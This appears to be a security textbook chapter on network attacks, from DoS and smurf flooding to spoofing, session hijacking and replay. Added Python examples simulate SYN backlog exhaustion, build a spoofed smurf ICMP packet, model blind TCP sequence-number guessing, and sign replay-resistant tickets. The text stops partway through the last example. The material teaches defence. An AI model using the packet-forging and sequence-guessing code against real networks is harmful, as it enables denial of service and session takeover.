A denial-of-service (DoS) attack is an attack designed to prevent a system or service from functioning normally. A DoS attack can exploit a known vulnerability in a specific application or operating system, or it can attack features (or weaknesses) in specific protocols or services. In a DoS attack, the attacker attempts to deny authorized users access either to specific information or to the computer system or network itself. This can be accomplished by crashing the system—taking it offline—or by sending so many requests that the machine is overwhelmed. The purpose of a DoS attack can be simply to prevent access to the target system, or the attack can be used in conjunction with other actions to gain unauthorized access to a computer or network. For example, a SYN flood attack can be used to prevent service to a system temporarily in order to take advantage of a trusted relationship that exists between that system and another. SYN flooding is an example of a DoS attack that takes advantage of the way TCP/IP networks were designed to function, and it can be used to illustrate the basic principles of any DoS attack. SYN flooding uses the TCP three-way handshake that establishes a connection between two systems. Under normal circumstances, the first system sends a SYN packet to the system with which it wants to communicate. The second system responds with a SYN/ACK if it is able to accept the request. When the initial system receives the SYN/ACK from the second system, it responds with an ACK packet, and communication can then proceed. This process is shown in Figure 15.1.
• Figure 15.1 The TCP three-way handshake
A SYN/ACK is actually the SYN packet sent to the first system combined with an ACK packet acknowledging the first system’s SYN packet.
In a SYN flooding attack, the attacker sends fake communication requests to the targeted system. Each of these requests will be answered by the target system, which then waits for the third part of the handshake. Since the requests are fake (a nonexistent IP address is used in the requests, so the target system is responding to a system that doesn’t exist), the target will wait for responses that never come, as shown in Figure 15.2. The target system will drop these connections after a specific time-out period, but if the attacker sends requests faster than the time-out period eliminates them, the system will quickly be filled with requests. The number of connections a system can support is finite, so when more requests come in than can be processed, the system will soon be reserving all its connections for fake requests. At this point, any further requests are simply dropped (ignored), and legitimate users who want to connect to the target system will not be able to do so, because use of the system has been denied to them.
• Figure 15.2 A SYN flooding–based DoS attack
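The capacity argument above, as an added example that is not from the book: a discrete-time model of the server-side table of half-open connections (SYN received, SYN/ACK sent, final ACK never arriving). It shows the finite table filling once unanswerable SYNs arrive faster than the time-out frees slots, so that a legitimate SYN is refused, and it shows how a shorter time-out (the mitigation the chapter discusses under defending against DoS) raises the arrival rate needed to fill the same table. The capacity, time-out and rate values are constructed for illustration.

```python
"""Half-open connection table under SYN pressure (added example, not from
the book).  Constructed parameters; models the chapter's argument only."""
from collections import deque
from dataclasses import dataclass, field


@dataclass
class SynBacklog:
    capacity: int                 # finite number of half-open entries the host keeps
    timeout: int                  # seconds before an unanswered entry is dropped
    pending: deque = field(default_factory=deque)   # expiry times, oldest first
    dropped: int = 0              # SYNs refused because the table was full

    def expire(self, now: int) -> None:
        """Free entries whose time-out has elapsed; with no third handshake
        step from the (nonexistent) sender, this is the only way slots free up."""
        while self.pending and self.pending[0] <= now:
            self.pending.popleft()

    def on_syn(self, now: int) -> bool:
        """Try to admit a SYN into the table.  False means it was dropped."""
        self.expire(now)
        if len(self.pending) >= self.capacity:
            self.dropped += 1
            return False
        self.pending.append(now + self.timeout)
        return True


def simulate(capacity: int, timeout: int, fake_rate: int, seconds: int) -> dict:
    """Feed `fake_rate` unanswerable SYNs per second for `seconds`, and once a
    second probe with one legitimate SYN.  A legitimate client completes the
    handshake, so its entry leaves the table immediately.  Returns the first
    second at which the legitimate SYN was refused (None if never), the
    final table occupancy, and the total number of SYNs dropped."""
    table = SynBacklog(capacity, timeout)
    first_refusal = None
    for t in range(seconds):
        for _ in range(fake_rate):
            table.on_syn(t)
        if table.on_syn(t):
            table.pending.pop()      # legitimate handshake completes; slot released
        elif first_refusal is None:
            first_refusal = t
    return {
        "first_refusal_at": first_refusal,
        "half_open": len(table.pending),
        "dropped": table.dropped,
    }


def steady_state_occupancy(fake_rate: int, timeout: int) -> int:
    """Entries held once arrivals and expiries balance: rate x time in table.
    Service is denied whenever this reaches the table's capacity."""
    return fake_rate * timeout


if __name__ == "__main__":
    # Same table (1024 entries) and the same 20 fake SYNs per second; only the
    # time-out differs.  60 s: refused from second 51 on.  5 s: never refused.
    print(simulate(capacity=1024, timeout=60, fake_rate=20, seconds=120))
    print(simulate(capacity=1024, timeout=5, fake_rate=20, seconds=120))
```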
Another simple DoS attack is the infamous ping of death (POD), and it illustrates the other type of attack—one targeted at a specific application or operating system, as opposed to SYN flooding, which targets a protocol. In the POD attack, the attacker sends an Internet Control Message Protocol (ICMP) ping packet equal to, or exceeding, 64KB. Certain older systems are not able to handle this size of packet, and the system will hang or crash.
Distributed Denial-of-Service
DoS attacks are conducted using a single attacking system. A DoS attack employing multiple attacking systems is known as a distributed denial-of-service (DDoS) attack. The goal of a DDoS attack is also to deny the use of or access to a specific service or system. DDoS attacks were made famous in 2000 with the highly publicized attacks on eBay, CNN, Amazon, and Yahoo!.
Exam Tip: A botnet is a network of machines controlled by a malicious user. Each of these controlled machines is commonly referred to as a zombie.
In a DDoS attack, service is denied by overwhelming the target with traffic from many different systems. A network of attack agents (sometimes called zombies) is created by the attacker, and upon receiving the attack command from the attacker, the attack agents commence sending a specific type of traffic against the target. If the attack network is large enough, even ordinary web traffic can quickly overwhelm the largest of sites. Creating a DDoS attack network is not a simple task. The attack agents are not willing agents—they are systems that have been compromised and on which the DDoS attack software has been installed. To compromise these agents, the attacker has to have gained unauthorized access to the system or tricked authorized users to run a program that installed the attack software. The creation of the attack network may in fact be a multistep process in which the attacker first compromises a few systems and then uses those systems as handlers or masters, which in turn compromise other systems. Once the network has been created, the agents wait for an attack message, which will include data on the specific target, before launching the attack. One important aspect of a DDoS attack is that with just a few messages to the agents, the attacker can have a flood of messages sent against the targeted system. Figure 15.3 illustrates a DDoS network with agents and handlers.
• Figure 15.3 DDoS attack
Tech Tip
Edge Blocking of ICMP
Blocking ICMP at the edge device of the network will prevent ICMP-based attacks from external sites while still allowing full ICMP functionality for traffic inside the network. Common practice is to block ICMP at the edge of IPv4 networks, although in IPv6, ICMP is a must-carry item and cannot be blocked.
A final option you should consider that will address several forms of DoS and DDoS attacks is to block ICMP packets at your border, since many attacks rely on ICMP. Blocking ICMP packets at the border devices prevents external ICMP packets from entering your network, and while this may block some functionality, it will leave internal ICMP functionality intact. It is also possible to block specific forms of ICMP; blocking Type 8, for instance, will block ICMP-based ping sweeps. It is worth noting that not all pings occur via ICMP; some tools, such as hping2, use TCP and UDP to carry ping messages.
Smurf Attack
In a specific DoS attack known as a smurf attack, the attacker sends a spoofed packet to the broadcast address for a network, which distributes the packet to all systems on that network. Further details are listed in the IP Address Spoofing section.
Defending Against DoS-Type Attacks
How can you stop or mitigate the effects of a DoS or DDoS attack? One important precaution is to ensure that you have applied the latest patches and upgrades to your systems and the applications running on them. Once a specific vulnerability is discovered, it does not take long before multiple exploits are written to take advantage of it. Generally you will have a small window of opportunity in which to patch your system between the time the vulnerability is discovered and the time exploits become widely available.
A vulnerability can also be discovered by hackers, and exploits provide the first clues that a system has been compromised. Attackers can also reverse-engineer patches to learn what vulnerabilities have been patched, allowing them to attack unpatched systems. Another approach involves changing the time-out option for TCP connections so that attacks such as the SYN flooding attack are more difficult to perform, because unused connections are dropped more quickly. For DDoS attacks, much has been written about distributing your own workload across several systems so that any attack against your system would have to target several hosts to be completely successful. While this is effective against some DDoS attacks, if large enough DDoS networks are created (with tens of thousands of zombies, for example), any network, no matter how much the load is distributed, can be successfully attacked. Such an approach also involves additional costs to your organization to establish this distributed environment. Addressing the problem in this manner is actually an attempt to mitigate the effect of the attack, rather than preventing or stopping an attack. To prevent a DDoS attack, you must either be able to intercept or block the attack messages or keep the DDoS network from being established in the first place. Tools have been developed that will scan your systems, searching for sleeping zombies waiting for an attack signal. Many of the current antivirus/spyware security suite tools will detect known zombie-type infections. The problem with this type of prevention approach, however, is that it is not something you can do to prevent an attack on your network—it is something you can do to keep your network from being used to attack other networks or systems. You have to rely on the community of network administrators to test their own systems to prevent attacks on yours.
War-Dialing and War-Driving
War-dialing is the term used to describe an attacker’s attempt to discover unprotected modem connections to computer systems and networks. The term’s origin is the 1983 movie WarGames, in which the star has his machine systematically call a sequence of phone numbers in an attempt to find a computer connected to a modem. In the case of the movie, the intent was to find a machine with games the attacker could play, though obviously an attacker could have other purposes once access is obtained. War-dialing was surprisingly successful, mostly because of rogue modems—unauthorized modems attached to computers on a network by authorized users. Generally the reason for attaching the modem is not malicious—an individual may simply want to be able to go home and then connect to the organization’s network to continue working. This has become history with the rise of remote desktop technology and ubiquitous Internet connectivity. Another avenue of attack on computer systems and networks has seen a tremendous increase over the last few years because of the increase in the use of wireless networks. War-driving is the unauthorized scanning for and connecting to wireless access points, frequently done while driving near a facility. Wireless networks have some obvious advantages—they free employees from the cable connection to a port on their wall, allowing them to move throughout the building with their laptops and still be connected.
Cross Check
Wireless Vulnerabilities
Wireless systems have their own vulnerabilities unique to the wireless protocols. Wireless systems are becoming very common. If your machine is wireless capable, how many wireless access points can you see from your current location? Securing wireless systems from unauthorized access is an essential element of a comprehensive security program. This material is covered in depth in Chapter 12.
Social Engineering
Social engineering relies on lies and misrepresentation, which an attacker uses to trick an authorized user into providing information or access the attacker would not normally be entitled to. The attacker might, for example, contact a system administrator and pretend to be an authorized user, asking to have a password reset. Another common ploy is to pose as a representative from a vendor who needs temporary access to perform some emergency maintenance. Social engineering also applies to physical access. Simple techniques include impersonating pizza or flower delivery personnel to gain physical access to a facility. Attackers know that, due to poor security practices, if they can gain physical access to an office, the chances are good that, given a little unsupervised time, a user ID and password pair might be found on a notepad or sticky note. Unsupervised access might not even be required, depending on the quality of the security practices of the organization. One of the authors of this book was once considering opening an account at a bank near his home. As he sat down at the desk across from the bank employee taking his information, the author noticed one of the infamous little yellow notes attached to the computer monitor the employee was using. The note read "password for June is junejune." It probably isn't too hard to guess what July's password might be. Unfortunately, this is all too often the state of security practices in most organizations. With that in mind, it is easy to see how social engineering might work and might provide all the information an attacker needs to gain unauthorized access to a system or network.
Null Sessions
Microsoft Windows systems prior to XP and Server 2003 exhibited a vulnerability in their Server Message Block (SMB) implementation that allowed users to establish null sessions. A null session is an unauthenticated (anonymous) connection to the Windows interprocess communication share (IPC$); once connected, an attacker could enumerate user names, group memberships, and shares without supplying any credentials. The good news is that Windows XP, Server 2003, and later restrict anonymous access by default and are not susceptible to this vulnerability unless that default is changed.
Sniffing
The group of protocols that makes up the TCP/IP suite was designed to work in a friendly environment in which everybody who connected to the network used the protocols as they were designed. The abuse of this friendly assumption is illustrated by network-traffic sniffing programs, sometimes referred to as sniffers. Sniffing is when someone examines all the network traffic that passes their NIC, whether addressed to them or not. A network sniffer is a software or hardware device that is used to observe traffic as it passes through a network on shared broadcast media. The device can be used to view all traffic, or it can target a specific protocol, service, or even string of characters (looking for logins, for example). Normally, the network device that connects a computer to a network is designed to ignore all traffic that is not destined for that computer. Network sniffers ignore this friendly agreement and observe all traffic on the network, whether destined for that computer or others, as shown in Figure 15.4. Some network sniffers are designed not just to observe all traffic but to modify traffic as well. Network sniffing is more difficult in switched network environments, because full-duplex switching eliminates the shared collision domain, but certain techniques can be used to circumvent this: mirroring traffic to a span port, ARP poisoning, and MAC flooding attacks that force a switch's address table to overflow so that it falls back to acting as a hub.
• Figure 15.4 Network sniffers listen to all network traffic.
Network sniffers can be used by network administrators to monitor network performance. They can be used to perform traffic analysis, for example, to determine what type of traffic is most commonly carried on the network and to determine which segments are most active. They can also be used for network bandwidth analysis and to troubleshoot certain problems (such as duplicate MAC addresses).
Exam Tip: A network interface card (NIC) that is listening to all network traffic and not just its own is said to be in "promiscuous mode."
Network sniffers can also be used by attackers to gather information that can be used in penetration attempts. Information such as an authorized user name and password can be viewed and recorded for later use whenever a protocol sends it in the clear (Telnet, FTP, and unencrypted HTTP logins, for example). The contents of e-mail messages can also be viewed as the messages travel across the network. It should be obvious that administrators and security professionals will not want unauthorized network sniffers on their networks because of the security and privacy concerns they introduce. Fortunately, for network sniffers to be most effective, they need to be on the internal network, which generally means that the chances for outsiders to use them against you are extremely limited. This is another reason that physical security is an important part of information security in today's environment.
Cross Check
Physical Access and Security
One of the challenges in a modern network is getting a connection to a point in the network where your sniffing will result in the discovery of interesting information. Getting access to an open port, or to an equipment room where routers and switches are maintained, is a failure of physical security. Physical security is an important component of a comprehensive information security program. At this point ask yourself: where can I connect into my company network? Can I get connections near high-value targets such as database servers? Details on physical security measures are covered in Chapter 8.
Spoofing
Spoofing is nothing more than making data look like it has come from a different source. This is possible in TCP/IP because of the friendly assumptions behind the protocols. When the protocols were developed, it was assumed that individuals who had access to the network layer would be privileged users who could be trusted.
Tech Tip
What Is Spoofing?
Spoofing is when you assemble packets with false header information to deceive the receiver as to the true address of the sender. This can be done to manipulate return packets in the case of ping sweeps, or to provide anonymity for e-mails.
When a packet is sent from one system to another, it includes not only the destination IP address and port but the source IP address as well. You are supposed to fill in the source with your own address, but nothing stops you from filling in another system's address; anyone who can write raw packets to the network can do so. This is one of the several forms of spoofing.
Spoofing E-Mail
In e-mail spoofing, a message is sent with a From address that differs from that of the sending system. This can be easily accomplished in several different ways using several programs. To demonstrate how simple it is to spoof an e-mail address, you can Telnet to port 25 (the port associated with e-mail) on a mail server. From there, you can fill in any address for the From and To sections of the message, whether or not the addresses are yours or even actually exist. You can use several methods to determine whether an e-mail message was sent by the source it claims to have been sent from, but most users do not question their e-mail and will accept as authentic where it appears to have originated.
A variation on e-mail spoofing, though not technically spoofing, is for the attacker to acquire a URL similar to the URL they want to spoof so that e-mail sent from their system appears to have come from the official site, until you read the address carefully. For example, if attackers want to spoof XYZ Corporation, which owns XYZ.com, the attackers might gain access to the URL XYZ.Corp.com (the registered domain here is Corp.com, and XYZ is merely a host name under it). An individual receiving a message from the spoofed corporation site would not normally suspect it to be a spoof but would take it to be official. This same method can be, and has been, used to spoof web sites. If, in addition, the attackers made their spoofed site appear similar to the official one, they could easily convince many potential viewers that they were at the official site. Today, many .com and other domains of common sites, as well as common typos of URLs, are purchased by the legitimate owner and directed to the legitimate site.
Cross Check
E-mail Spoofing
E-mail was created in an era with a different security environment, one where attribution was not even an afterthought. This has led to issues associated with trust regarding e-mails. Full details of securing e-mail are covered in Chapter 16.
IP Address Spoofing
IP is designed to work so that the originators of any IP packet include their own IP address in the source portion of the packet. While this is the intent, nothing prevents a system from inserting a different address in the source portion of the packet. This is known as IP address spoofing. An IP address can be spoofed for several reasons. In a specific DoS attack known as a smurf attack, the attacker sends a spoofed packet to the broadcast address for a network, which distributes the packet to all systems on that network. In the smurf attack, the packet sent by the attacker to the broadcast address is an echo request with the source address forged so that it appears that another system (the target system) has made the echo request. The normal response of a system to an echo request is an echo reply, and it is used in the ping utility to let a user know whether a remote system is reachable and is responding. In the smurf attack, the request is sent to all systems on the network, so all will respond with an echo reply to the target system, as shown in Figure 15.5. The attacker has sent one packet and has been able to generate as many as 254 responses (on a /24 network) aimed at the target. Should the attacker send several of these spoofed requests, or send them to several different networks, the target can quickly become overwhelmed with the volume of echo replies it receives.
• Figure 15.5 Smurfing used in a smurf DoS attack
Exam Tip: A smurf attack allows an attacker to use a network structure to send large volumes of packets to a victim. By sending ICMP echo requests to a broadcast IP address, with the victim as the source address, the multitudes of replies will flood the victim system.
Spoofing and Trusted Relationships
Spoofing can also take advantage of a trusted relationship between two systems. If two systems are configured to accept the authentication accomplished by each other, an individual logged on to one system might not be forced to go through an authentication process again to access the other system. An attacker can take advantage of this arrangement by sending a packet to one system that appears to have come from a trusted system. Since the trusted relationship is in place, the targeted system may perform the requested task without authentication. Since a reply will often be sent once a packet is received, the system that is being impersonated could interfere with the attack, since it would receive an acknowledgment for a request it never made and would answer it with a reset. The attacker will often initially launch a DoS attack (such as a SYN flooding attack) to temporarily take out the spoofed system for the period of time that the attacker is exploiting the trusted relationship. Once the attack is completed, the DoS attack on the spoofed system would be terminated, and the system administrators, apart from having a temporarily nonresponsive system, might never notice that the attack occurred. Figure 15.6 illustrates a spoofing attack that includes a SYN flooding attack.
• Figure 15.6 Spoofing to take advantage of a trusted relationship
Because of this type of attack, administrators are encouraged to strictly limit any trusted relationships between hosts. Firewalls should also be configured to discard any packets arriving from outside the firewall that have source addresses indicating they originated from inside the network (a situation that should not occur normally and that indicates spoofing is being attempted), and, following the ingress-filtering guidance of BCP 38, to discard outbound packets whose source address does not belong to the internal network, so that your own network cannot be used as the launching point for a spoofing attack.
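The following added example (not code from the book) puts the smurf attack and the two filtering defenses described above into working form: it builds the spoofed ICMP echo request with a forged source, computes how many replies one packet to a /24 broadcast can produce, and implements the two checks that break the attack, a router that refuses directed broadcasts and a BCP 38-style border filter. The helper names, the addresses (RFC 5737 documentation ranges) and the payload are assumptions chosen for the demo.

```python
# Added example (not from the book): the spoofed ICMP echo request behind a smurf
# attack, the reply count a /24 broadcast can produce, and the two checks that
# stop it: a router that refuses directed broadcasts, and a BCP 38-style border
# filter that drops packets whose source address does not belong where they came
# from. Addresses are RFC 5737 documentation ranges, chosen for illustration.
import ipaddress
import struct

IPV4_HDR = "!BBHHHBBH4s4s"   # version/IHL, TOS, total length, ID, flags/frag, TTL, proto, checksum, src, dst
ICMP_HDR = "!BBHHH"          # type, code, checksum, identifier, sequence


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum used by the IPv4 and ICMP headers.
    Verifying a header that already carries its checksum yields 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(src_ip: str, dst_ip: str, payload: bytes = b"smurf") -> bytes:
    """IPv4 packet carrying an ICMP echo request. The stack fills src_ip in for
    an honest sender, but a raw socket lets the attacker write anything: the
    victim's address as source and a network's broadcast address as destination."""
    icmp = struct.pack(ICMP_HDR, 8, 0, 0, 1, 1) + payload
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip = struct.pack(IPV4_HDR, 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                     ipaddress.IPv4Address(src_ip).packed,
                     ipaddress.IPv4Address(dst_ip).packed)
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    return ip + icmp


def parse_ipv4(packet: bytes) -> dict:
    """The header fields a router or filter actually looks at."""
    _, _, length, _, _, ttl, proto, _, src, dst = struct.unpack(IPV4_HDR, packet[:20])
    return {"src": str(ipaddress.IPv4Address(src)), "dst": str(ipaddress.IPv4Address(dst)),
            "proto": proto, "ttl": ttl, "len": length}


def amplification(subnet: str) -> int:
    """Echo replies one spoofed request can trigger: every usable host on the
    subnet (254 on a /24), all aimed at the forged source."""
    return max(ipaddress.IPv4Network(subnet).num_addresses - 2, 0)


def router_forwards(packet: bytes, subnet: str, directed_broadcast: bool) -> bool:
    """A router serving `subnet` with directed broadcasts disabled (the fix that
    removes a network from the smurf amplifier pool) drops packets addressed
    to that subnet's broadcast address instead of delivering them."""
    net = ipaddress.IPv4Network(subnet)
    dst = ipaddress.IPv4Address(parse_ipv4(packet)["dst"])
    if dst == net.broadcast_address:
        return directed_broadcast
    return dst in net


def border_filter_accepts(packet: bytes, my_nets: list, from_outside: bool) -> bool:
    """BCP 38 filtering at a network border: a packet entering from outside must
    not claim one of my addresses as source, and a packet leaving must."""
    src = ipaddress.IPv4Address(parse_ipv4(packet)["src"])
    mine = any(src in ipaddress.IPv4Network(n) for n in my_nets)
    return (not mine) if from_outside else mine


if __name__ == "__main__":
    # Victim 203.0.113.10 is framed as the source; 192.0.2.0/24 is the amplifier;
    # the attacker sits in 198.51.100.0/24.
    pkt = build_echo_request("203.0.113.10", "192.0.2.255")
    print(parse_ipv4(pkt), "replies per packet:", amplification("192.0.2.0/24"))
    print("amplifier router forwards it:", router_forwards(pkt, "192.0.2.0/24", directed_broadcast=False))
    print("attacker's ISP lets it out:", border_filter_accepts(pkt, ["198.51.100.0/24"], from_outside=False))
```

Either check alone defeats this particular packet: the amplifier's router never delivers the broadcast, or the attacker's own provider drops the packet on egress because 203.0.113.10 is not one of its addresses.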
Spoofing and Sequence Numbers
How complicated the spoofing is depends heavily on several factors, including whether the traffic is encrypted and where the attacker is located relative to the target. Spoofing attacks from inside a network, for example, are much easier to perform than attacks from outside of the network, because the inside attacker can observe the traffic to and from the target and can do a better job of formulating the necessary packets. Formulating the packets is more complicated for external attackers because a sequence number is associated with TCP packets. A sequence number is a 32-bit number established by the host that advances with each byte of data sent. Packets are not guaranteed to be received in order, and the sequence number can be used to help reorder packets as they are received and to refer to packets that may have been lost in transmission. In the TCP three-way handshake, two sets of sequence numbers are created, as shown in Figure 15.7. The first system chooses a sequence number to send with the original SYN packet. The system receiving this SYN packet acknowledges with a SYN/ACK. It sends an acknowledgment number back, which is based on the first sequence number plus one (that is, it increments the sequence number sent to it by one). It then also creates its own sequence number and sends that along with it. The original system receives the SYN/ACK with the new sequence number. It increments the sequence number by one and uses it as the acknowledgment number in the ACK packet with which it responds.
• Figure 15.7 Three-way handshake with sequence numbers
The difference in the difficulty of attempting a spoofing attack from inside a network and from outside involves determining the sequence number. If the attacker is inside of the network and can observe the traffic with which the target host responds, the attacker can easily see the sequence number the system creates and can respond with the correct sequence number. If the attacker is external to the network and the sequence number the target system generates is not observed, it is next to impossible for the attacker to provide the final ACK with the correct sequence number. So the attacker has to guess what the sequence number might be.
Sequence numbers were historically somewhat predictable, based on the operating systems in question. Sequence numbers for each session are not started from the same number, so that different packets from different concurrent connections will not have the same sequence numbers. Instead, the sequence number for each new connection is incremented by some large number to keep the numbers from being the same. The sequence number may also be incremented by some large number every second (or some other time period). An external attacker has to determine what values are used for these increments. The attacker can do this by attempting connections at various time intervals to observe how the sequence numbers are incremented. Once the pattern is determined, the attacker can attempt a legitimate connection to determine the current value, and then immediately attempt the spoofed connection. The spoofed connection sequence number should be the legitimate connection incremented by the determined value or values. Modern operating systems randomize their initial sequence numbers (RFC 6528 describes the recommended method: a clock value plus a secret keyed hash of the connection's addresses and ports), which makes this blind prediction impractical against a current stack; the weakness lives on in embedded and legacy systems.
Sequence numbers are also important in session hijacking, which is discussed in the following section. When an attacker spoofs addresses and imposes his packets in the middle of an existing connection, this is the man-in-the-middle attack.
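The added example below (not from the book) runs the handshake of Figure 15.7 against a toy server and shows the blind attack just described succeeding when the server's initial sequence numbers follow a fixed pattern and failing when they are randomized. The per-connection and per-second constants in PredictableISN are assumed values modelled on the old BSD behaviour, RandomizedISN follows the RFC 6528 recipe, and the addresses, ports and frozen clock are constructed for the demo.

```python
# Added example (not from the book): a toy TCP server whose three-way handshake
# works exactly as Figure 15.7 describes, driven by two initial sequence number
# (ISN) generators. PredictableISN models the old 4.4BSD scheme (constant step per
# connection and per second; the constants here are assumed for illustration).
# RandomizedISN follows RFC 6528: a 4-microsecond clock plus a secret keyed hash
# of the connection's addresses. A blind attacker samples the server, then tries
# to complete a handshake while posing as a trusted host whose SYN/ACK he never sees.
import hashlib
import os

MASK32 = 0xFFFFFFFF


class PredictableISN:
    def __init__(self, clock, per_conn=64000, per_sec=128000):
        self.clock, self.per_conn, self.per_sec = clock, per_conn, per_sec
        self.start, self.counter = clock(), 1_000_000

    def next_isn(self, client):
        self.counter += self.per_conn
        elapsed = int(self.clock() - self.start)
        return (self.counter + elapsed * self.per_sec) & MASK32


class RandomizedISN:
    def __init__(self, clock):
        self.clock = clock
        self.secret = os.urandom(16)          # per-boot secret, never on the wire

    def next_isn(self, client):
        four_us_ticks = int(self.clock() * 250_000)
        digest = hashlib.sha256(self.secret + repr(client).encode()).digest()
        return (four_us_ticks + int.from_bytes(digest[:4], "big")) & MASK32


class Server:
    """Keeps the half-open connections of Figure 15.7 keyed by (ip, port)."""
    def __init__(self, isn_source):
        self.isn_source, self.pending, self.established = isn_source, {}, set()

    def on_syn(self, client, client_seq):
        isn = self.isn_source.next_isn(client)
        self.pending[client] = isn
        return {"flags": "SYN/ACK", "seq": isn, "ack": (client_seq + 1) & MASK32}

    def on_ack(self, client, ack_number):
        isn = self.pending.pop(client, None)
        if isn is not None and ack_number == (isn + 1) & MASK32:
            self.established.add(client)
            return True
        return False


def blind_spoof(server, trusted_host, attacker_ip="198.51.100.7"):
    """Attacker's view: the SYN/ACKs for his own probes come back to him, so he
    sees those ISNs; the SYN/ACK for the spoofed SYN goes to trusted_host, so he
    must guess its ISN from the probes and send the final ACK blind."""
    probes = [server.on_syn((attacker_ip, 40000 + i), 1)["seq"] for i in range(2)]
    step = (probes[1] - probes[0]) & MASK32
    guess = (probes[1] + step) & MASK32
    server.on_syn(trusted_host, 5000)           # reply discarded: attacker never sees it
    return server.on_ack(trusted_host, (guess + 1) & MASK32)


if __name__ == "__main__":
    clock = lambda: 0.0                         # frozen clock keeps the demo deterministic
    trusted = ("192.0.2.9", 5000)
    print("predictable ISN, spoof succeeds:", blind_spoof(Server(PredictableISN(clock)), trusted))
    print("randomized ISN, spoof succeeds:", blind_spoof(Server(RandomizedISN(clock)), trusted))
```

In the real attack the trusted host would answer the unexpected SYN/ACK with a reset, which is why the attacker first silences it with the SYN flood described in the preceding section.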
TCP/IP Hijacking
TCP/IP hijacking and session hijacking are terms used to refer to the process of taking control of an already existing session between a client and a server. The advantage to an attacker of hijacking over attempting to penetrate a computer system or network is that the attacker doesn't have to circumvent any authentication mechanisms, since the user has already authenticated and established the session. Once the user has completed the authentication sequence, the attacker can then usurp the session and carry on as if the attacker, and not the user, had authenticated with the system. To prevent the user from noticing anything unusual, the attacker can decide to attack the user's system and perform a DoS attack on it, taking it down so that the user, and the system, will not notice the extra traffic that is taking place. Hijack attacks generally are used against web and Telnet sessions.
Sequence numbers as they apply to spoofing also apply to session hijacking, since the hijacker will need to provide the correct sequence number to continue the appropriated session.
Man-in-the-Middle Attacks
A man-in-the-middle attack, as the name implies, generally occurs when attackers are able to place themselves in the middle of two other hosts that are communicating. Ideally, this is done by ensuring that all communication going to or from the target host is routed through the attacker's host (which can be accomplished if the attacker can compromise the router for the target host). The attacker can then observe all traffic before relaying it and can actually modify or block traffic. To the target host, it appears that communication is occurring normally, since all expected replies are received. Figure 15.8 illustrates this type of attack.
• Figure 15.8 A man-in-the-middle attack
There are numerous methods of instantiating a man-in-the-middle attack; one of the common methods is via session hijacking. Session hijacking can occur when information such as a cookie is stolen, allowing the attacker to impersonate the legitimate session. This attack can be the result of a cross-site scripting attack, which tricks a user's browser into executing script that steals the cookie (one reason session cookies should carry the HttpOnly and Secure flags). The amount of information that can be obtained in a man-in-the-middle attack will obviously be limited if the communication is encrypted. Even in this case, however, sensitive information can still be obtained, since knowing what communication is being conducted, and between which individuals, may, in fact, provide information that is valuable in certain circumstances.
Man-in-the-Middle Attacks on Encrypted Traffic
The term "man-in-the-middle attack" is sometimes used to refer to a more specific type of attack, one in which the encrypted traffic issue is addressed. If you wanted to communicate securely with your friend Bob, you might ask him for his public key so you could encrypt your messages to him. You, in turn, would supply Bob with your public key. An attacker can conduct a man-in-the-middle attack by intercepting your request for Bob's public key and the sending of your public key to him. The attacker would replace your public key with her own and send that on to Bob, and she would likewise send her own public key to you in place of Bob's. Now when either you or Bob encrypts a message, it will be encrypted using the attacker's public key, enabling the attacker to intercept it, decrypt it, and then send it on by re-encrypting it with the appropriate key for either you or Bob. Each of you thinks you are transmitting messages securely, but in reality your communication has been compromised. Well-designed cryptographic products use techniques such as mutual authentication, public keys bound to identities by certificates from an authority both parties already trust, and out-of-band verification of key fingerprints to avoid this problem.
Cross Check
Encryption
Cryptography and encryption are tools that can solve many of our secrecy problems. The challenges solved through encryption and the new problems associated with the use of encryption require an understanding of the technical details. Public key encryption, discussed in detail in Chapters 5 and 6, uses two keys: a public key, which anybody can use to encrypt or "lock" your message, and a private key, which only you know and which is used to "unlock" or decrypt a message locked with your public key. One of the key challenges associated with the use of public keys and corresponding private keys is determining who has what key values. Do you have your own key pair? If so, do you know the public key value that you need to share with others?
Replay Attacks
A replay attack occurs when the attacker captures a portion of a communication between two parties and retransmits it at a later time. For example, an attacker might replay a series of commands and codes used in a financial transaction to cause the transaction to be conducted multiple times. Generally replay attacks are associated with attempts to circumvent authentication mechanisms, such as the capturing and reuse of a certificate or ticket.
Exam Tip: The best method for defending against replay attacks is through the use of encryption and short time frames for legal transactions. Encryption can protect the contents from being understood, and a short time frame for a transaction prevents subsequent use.
The best way to prevent replay attacks is with encryption, cryptographic authentication, and timestamps. If a portion of the certificate or ticket includes a date/time stamp or an expiration date/time, and this portion is also protected cryptographically as part of the ticket or certificate (so that the attacker cannot simply edit the time), replaying it at a later time will prove useless, since it will be rejected as having expired. A one-time nonce that the receiver records closes the remaining gap: without it, a captured ticket can still be replayed inside its validity window.
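As an added example (not code from the book) of the timestamp-plus-cryptographic-authentication defense just described, the following ticket service issues a ticket whose timestamp and one-time nonce are covered by an HMAC, and rejects a ticket that is forged, expired, or presented a second time. The key, the 30-second validity window, the claim names and the transaction values are assumptions for the demo; the ticket body is authenticated but not encrypted, so its contents remain readable.

```python
# Added example (not from the book): a ticket carrying a timestamp and a one-time
# nonce under an HMAC, and a verifier that rejects a ticket that is forged,
# expired, or presented twice. Key, TTL and field names are assumed for the demo.
import base64
import binascii
import hashlib
import hmac
import json
import os


def _sign(key: bytes, body: bytes) -> str:
    return hmac.new(key, body, hashlib.sha256).hexdigest()


class TicketService:
    def __init__(self, key: bytes, ttl_seconds: int = 30):
        self.key, self.ttl = key, ttl_seconds
        self.seen = {}          # nonce -> time after which it can be forgotten

    def issue(self, subject: str, amount: int, now: int) -> str:
        claims = {"sub": subject, "amt": amount, "iat": now, "nonce": os.urandom(8).hex()}
        body = json.dumps(claims, sort_keys=True).encode()
        return base64.urlsafe_b64encode(body).decode() + "." + _sign(self.key, body)

    def redeem(self, token: str, now: int) -> tuple:
        """Return (accepted, reason). The signature is verified before any
        claim inside the ticket is trusted."""
        try:
            encoded, sig = token.split(".")
            body = base64.urlsafe_b64decode(encoded)
        except (ValueError, binascii.Error):
            return False, "malformed"
        if not hmac.compare_digest(sig, _sign(self.key, body)):   # constant-time compare
            return False, "bad signature"
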